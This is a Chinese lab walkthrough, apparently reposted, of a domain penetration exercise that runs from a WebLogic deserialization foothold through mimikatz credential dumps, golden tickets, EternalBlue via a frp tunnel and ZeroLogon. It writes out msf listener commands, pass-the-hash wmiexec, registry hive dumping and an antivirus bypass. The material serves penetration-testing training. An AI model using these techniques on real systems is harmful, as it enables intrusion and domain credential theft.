红日内网渗透靶场2

news2024/11/17 1:54:14

目录

环境搭建:

Web渗透:

weblogic漏洞利用

java反序列化漏洞利用、哥斯拉获取shell

上线msf

msf派生shell到cs

内网信息收集

mimikatz获取用户密码

cs横向移动

PTT攻击(票据传递)

方法2:通过msf利用永恒之蓝以及3389端口

上线cs

cs派生shell给msf

fscan扫描内网

frp搭建socks5隧道代理

永恒之蓝的利用

kiwi获取用户hash

3389远程登录

cve-2020-1472域内提权漏洞的利用

将dc机器账户密码设置为空

wmiexec横向

恢复dc机器账户密码

远程连接域控和pc主机


环境搭建:

Web、PC两块网卡,都是nat模式+仅主机模式。DC为仅主机模式。三台主机的默认密码都是1qaz@WSX。

攻击机:kali(nat模式)、win10物理机。

内网网段:10.10.10.1/24

外网网段:192.168.111.1/24

kali:192.168.111.128
web:外:192.168.111.80  内:10.10.10.80
pc:外:192.168.128.201  内:10.10.10.201
dc:10.10.10.10

都进行登录,登录pc之后用管理员账号administrator/1qaz@WSX开启360杀软。

登录web服务器时注意:先登录本地用户WEB/de1ay,密码也是默认的那个密码,然后会提示密码过期 要进行修改,修改完成登录之后进行注销再登录到mssql用户(域用户),也是默认的那个密码,然后用本地管理员账号也就是刚刚修改了密码的那个,开启360杀软,然后以管理员身份运行weblogic服务。

至此,环境就搭建好了。

Web渗透:

Nmap扫描端口开放情况

开放了多个端口,该靶机的利用点为7001端口

weblogic漏洞利用

看到7001就想到了weblogic,浏览器访问

访问console目录跳转到weblogic控制台登录页面

尝试了几个弱口令,没有登录成功,用weblogic专门的扫描工具进行扫描看看存在什么漏洞

看到存在java反序列化漏洞,用工具进行上传payload,然后用哥斯拉连接。

java反序列化漏洞利用、哥斯拉获取shell

哥斯拉生成payload

复制生成的payload内容,用java反序列化漏洞利用工具进行上传

用哥斯拉进行连接

上线msf

生成payload反弹shell

然后通过哥斯拉上传到web服务器,msf开启监听之后再运行(按理说上传的这个木马会被360给杀掉,但是我这里没有被杀掉,甚至手动拿360来进行木马查杀都没有发现,但是在物理机上就直接被杀软给干掉了)

成功反弹shell

msf派生shell到cs

Cs开启监听

Msf

cs上线成功

内网信息收集

shell ipconfig发现内网网段10.10.10.0/24

Shell ipconfig /all 发现存在域de1ay.com,根据dns服务器判断域控ip为10.10.10.10

 

Net config workstation

进行提权做进一步的信息收集

点击launch之后提权成功

查询域内用户 net user /domain

查询域控 net group “domain controllers” /domain

查询域内其他主机名

分别ping一下dc和pc拿到ip,域控和之前判断的一样

Ping pc没通  被防火墙拦截了,但也拿到了ip

portscan 探测存活主机+端口扫描

发现域控开了445端口。

mimikatz获取用户密码

执行mimikatz获取用户散列值和明文密码

域管理员

Web主机本地管理员

cs横向移动

因为开放了445端口, 创建一个smb监听器,

然后进行psexec横向

执行后就看到成功拿下域控

同理对pc进行横向

 

成功拿下pc

PTT攻击(票据传递)

根据前面用猕猴桃抓取到的用户NTLM HASH和SID值,对黄金票据进行利用

选中administrator权限的web主机 右键 access->golden ticket

成功之后进行验证

伪造用户名成功

刚刚主要是利用cs进行内网的渗透,接着通过msf进行一个内网的渗透,记录一下。

方法2:通过msf利用永恒之蓝以及3389端口

考虑到web主机和pc都有360杀软,所以正常来说不能通过上传msf生成的木马到web主机上进行反弹shell的操作。

上线cs

我们可以通过cs来生成一个web delivery,即通过powershell绕过360杀软上线cs

 

然后通过哥斯拉执行powershell上线

成功上线cs

cs派生shell给msf

打开msf,启动handler监听

msfconsole

use exploit/multi/handler

set payload windows/meterpreter/reverse_http

set lhost xxxxxx  

set lport xxxx

run

cs新建一个外部监听

然后在cs的控制台输入spawn cs-msf

msf中成功接收

尝试getsystem提权,行不通。

fscan扫描内网

上传fscan到web主机上然后进行扫描

然后利用fscan扫描内网网段

发现10和80都存活且都存在永恒之蓝

由于都开了防火墙,所以说远程是打不进去的,尝试用本地流量来打。

frp搭建socks5隧道代理

通过frp建立一个SOCKS隧道

上传完之后编辑frpc.ini,改为本地的ip

然后现在kali本地启动服务端

再运行刚刚上传的客户端

永恒之蓝的利用

然后通过执行命令

setg Proxies socks5:127.0.0.1:8989

Setg ReverseAllowProxy true

设置一个全局代理

 

攻击成功。

kiwi获取用户hash

接着通过kiwi抓取用户密码

Load kiwi

Creds_all

拿到了web主机本地用户的用户名和密码以及域用户的用户名和密码。

3389远程登录

最开始的扫描过程中得知了是开了3389端口的,可以进行远程登录一波

修改proxychains的配置文件vi /etc/proxychains.conf

然后通过代理进行远程登录

由于使用的是本地管理员账户进行登录,所以可以退了杀软,关闭防火墙

cve-2020-1472域内提权漏洞的利用

接着对cve-2020-1472域内提权漏洞进行利用(下文相关的exp和poc都可以在github上找到)

由于不知道是否存在该域内提取漏洞,所以先使用github上的poc对dc进行检测是否存在该漏洞

开着代理来执行poc

说明dc存在该漏洞。

将dc机器账户密码设置为空

然后用该漏洞的exp进行攻击,该攻击使得dc机器账户的密码设置为空

重置成功

接着通过impacket包(先apt install python3-impacket)来dump用户hash,linux下$代表变量 所以要加\进行转义

拿到域管理员的hash。因为知道了这个的密码强度过高,直接进行解密的话是无法成功的

wmiexec横向

可以通过impacket包的wmiexec进行一个横向

Proxychains impacket-wmiexec -hashes NTLM-HASH ./administrator@10.10.10.10

成功拿到dc的shell,接下来就是要拷贝dc中SAM数据库到本地,然后提取里面的数据来恢复刚刚我们清空的dc机器账户的密码(这是因为如果机器账户hash长时间为空,可能会导致脱域,对内网的使用产生重大影响,因此拿到权限的第一时间需要把hash重置回去。)

先执行如下三条命令将数据库的三个文件保存到dc本地,然后用get命令进行下载 最后可以在dc中将其删掉

reg save HKLM\SYSTEM system.save

reg save HKLM\SAM sam.save

reg save HKLM\SECURITY security.save

get system.save

get sam.save

get security.save

del /f system.save

del /f sam.save

del /f security.save

 

然后可以在靶机中将其删掉

恢复密码之前顺便修改一下域管的密码

恢复dc机器账户密码

利用impacket-secretsdump提取那三个文件里的数据

然后利用脚本进行恢复

 

这时候再用刚刚的impacket-secretsdump -no-pass来dump 用户hash,

发现无法获取了,说明恢复成功

远程连接域控和pc主机

接着在刚刚开启的远程桌面进行远程连接域控 administrator/Admin12345

 

成功连接域控,关闭其防火墙

然后在服务管理器发现域内另外一台机器pc

再ping一下它就拿到它的ip,再次进行远程登录,开始登录失败了,要以de1ay域的管理员登录才能成功,如下图

同样,把杀软退了和关闭防火墙,防火墙都关了之后就可以正常进行上线了,后续就不展示了(开始用cs上线过)

最后附一个链接了解cve-2020-1472域内提取漏洞:

https://www.jianshu.com/p/525be0335404

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/164404.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

测试之分类【测试对象、是否查看代码、开发】

文章目录1. 按测试对象分类2. 按照是否查看代码划分3. 按照开发阶段划分1. 按测试对象分类 可靠性测试容错性测试安装卸载测试内存泄露测试弱网测试 (1)可靠性测试 可靠性 正常运行时间 / (正常运行时间 非正常运行时间) * 100% (最高 10…

Servlet的实战用法(表白墙前后端)

作者:~小明学编程 文章专栏:JavaEE 格言:热爱编程的,终将被编程所厚爱。 目录 服务器版本的表白墙 创建项目 约定前后端交互接口 获取全部留言 发表新的留言 服务端代码 创建Message类 创建DBUtil类 创建MessageServlet…

双指针合集

87合并两个有序的数组 import java.util.*; public class Solution {public void merge(int A[], int m, int B[], int n) { int i m-1;int j n-1;for(int k nm-1;k>0;k--){if(j<0) A[k] A[i--];else if(i<0) A[k] B[j--];else if(A[i]>B[j]) A[k] A[i--]…

六道数据结构算法题详解

目录 1.力扣350题. 两个数组的交集 II 2.力扣121题. 买卖股票的最佳时机 3.力扣566题. 重塑矩阵 4.力扣118题. 杨辉三角 5.牛客BM13 判断一个链表是否为回文结构 6.牛客BM14 链表的奇偶重排 1.力扣350题. 两个数组的交集 II 题目&#xff1a;给你两个整数数组 nums1 和 n…

2022年终总结---权衡好工作和生活

2022总结 【校园】2022年6月研究生顺利毕业&#xff0c;让下文的一切才变的有机会。感谢师弟送学长毕业&#xff0c;感谢在最后时刻各位舍友帮忙送材料&#xff0c;怀念最后一个月一起打球的时光。 【工作】2022年6月入职阿里&#xff0c;成为打工人。在这个大的平台&#xf…

Goland项目使用gomod配置

Goland 项目创建 goland2020.3 及以上 IDE&#xff0c;默认创建的 go 项目 就是使用 gomod 管理&#xff01; goland2020.3 及以下的 IDE&#xff0c;创建项目时需要选择 带小括号 vgo 的才是 gomod 管理模式 下图为使用 goland2021.3 版本创建使用 gomod 管理的 go 项目&…

14种可用于时间序列预测的损失函数

在处理时间序列预测问任务时&#xff0c;损失函数的选择非常重要&#xff0c;因为它会驱动算法的学习过程。以往的工作提出了不同的损失函数&#xff0c;以解决数据存在偏差、需要长期预测、存在多重共线性特征等问题。本文工作总结了常用的的 14 个损失函数并对它们的优缺点进…

线段树(Segment tree)

线段树 线段树是一种二叉树形数据结构,用以储存区间或线段,并且允许快速查询结构内包含某一点的所有区间。 视频讲解 线段树主要实现两个方法:「求区间和」&「修改区间」,且时间复杂度均为 O(logn)。 nums = [1, 2, 3, 4, 5] 对应的线段树如下所示: 使用数组表示线段…

【阶段三】Python机器学习33篇:机器学习项目实战:医学病症关联规则分析

本篇的思维导图: 医学病症关联规则分析 项目背景 本项目演示一个医学领域的有趣应用——病症关联规则分析,同时利用apyori库和mlxtend库来编写代码,从数据分析的角度去研究病症背后的关联规则。假设有一种医学理论认为,五脏和一些病症之间存在关联关系,见下表。例…

4.线性神经网络

4.线性神经网络 目录 线性回归 线性回归的基本元素 线性模型损失函数解析解随机梯度下降 矢量化加速正态分布与平方损失 优化方法 梯度下降选择学习率小批量随机梯度下降选择批量大小总结 线性回归的从零开始实现 生成数据集读取数据集初始化模型参数定义模型定义损失函数定义…

磨金石教育摄影技能干货分享|优秀摄影作品欣赏——世界掠影

这世上很多地方都在发生着有趣的事&#xff0c;很多地方不同的人与物&#xff0c;都在不同的时间和环境下展现着不同的状态。让我们跟随摄影师的镜头去欣赏这些精彩的画面吧。1 悬而未定想象一下这张照片是什么角度拍的&#xff1f;是不是看上去很像俯拍&#xff1f;无论怎么看…

【Python】groupby操作后不把列作为索引单独提出

这是一个困了我几天的问题。 一开始的搜索方向错了&#xff0c;按照groupby的key column搜索&#xff0c;没有搜到。 最近悟出的一个技巧是&#xff0c;没有头绪时看看数据类型和数据内容。如果思路是没问题的情况下。 问题描述 date_date.groupby([XXXX]) poi_date.groupby(…

可视化工具,Java 应用性能分析、调优

JVisualVM 简介 VisualVM 是Netbeans的profile子项目&#xff0c;已在JDK6.0 update 7 中自带&#xff0c;能够监控线程&#xff0c;内存情况&#xff0c;查看方法的CPU时间和内存中的对 象&#xff0c;已被GC的对象&#xff0c;反向查看分配的堆栈(如100个String对象分别由哪…

动态规划 —— 最长上升子序列全解

题目链接&#xff1a;300. 最长递增子序列 - 力扣&#xff08;LeetCode&#xff09; 朴素做法 设元素数组为arr&#xff0c;定义一维数组dp&#xff0c;dp[i]表示以i位置结尾的子序列中&#xff0c;最长的上升子序列的长度 这些子序列可以被划分成哪些子集合呢&#xff1f; …

ArcGIS10.8保姆式安装教程,超详细;附安装包

安装前请关闭杀毒软件&#xff0c;系统防火墙&#xff0c;断开网络连接 参考链接&#xff1a;请点击 下载链接&#xff1a; 通过百度网盘分享的文件&#xff1a;ArcGIS10.8zip 链接:https://pan.baidu.com/s/1023fbyQpt6r6U6wtgBuReg 提取码:820w 复制这段内容打开「百度网盘A…

设计模式——解释器模式

解释器模式一、基本思想二、应用场景三、结构图四、代码五、优缺点优点缺点一、基本思想 给分析对象定义一个语言&#xff0c;并定义该语言的文法表示&#xff0c;再设计一个解析器来解释语言中的句子。 二、应用场景 当对象间存在一对多关系&#xff0c;一个对象的状态发生…

ESP32蓝牙+EC11旋转编码器实现对电脑音量控制

ESP32蓝牙EC11旋转编码器实现对电脑音量控制✨本项目基于Arduino开发框架下功能实现。 &#x1f6e0;蓝牙设备添加和连接 ⚡需要有带蓝牙硬件支持的电脑才能实现连接并控制&#xff0c;当然手机也可以连接但是不能实现对手机音量控制&#xff0c; &#x1f33f;以Win10系统电脑…

java 语法基础看这一篇文章就够了

第一章 关键字 关键字的概念1被Java语言赋予了特殊含义&#xff0c;用作专门用途的字符串(单词)关键字特点1关键字中所有字母都是小写常见关键字 classinterfaceenumbyteshortintfloatlongdoublecharbooleanvoidtruefalsenullifelseswitchcasedefaultwhiledoforbreakcontinuer…

数字信号处理音频FIR去噪滤波器(基于MATLAB GUI的开发)

1、内容简介利用MATLAB GUI设计平台&#xff0c;用窗函数法设计FIR数字滤波器&#xff0c;对所给出的含有噪声的声音信号进行数字滤波处理&#xff0c;得到降噪的声音信号&#xff0c;进行时域频域分析&#xff0c;同时分析不同窗函数的效果。将文件解压至一个目录下&#xff0…

第6章 ESP32-Kconfig配置

ESP32-Kconfig配置 1. 新建Kconfig.projbuild文件 2. 写入配置项 新建menu menu "点灯配置"endmenu运行 idf.py menuconfig&#xff0c;结果如下 powershel vscode 可以看到&#xff0c;power shell中文支持上有乱码&#xff0c;所以接下来选择英文 2. 配置menu…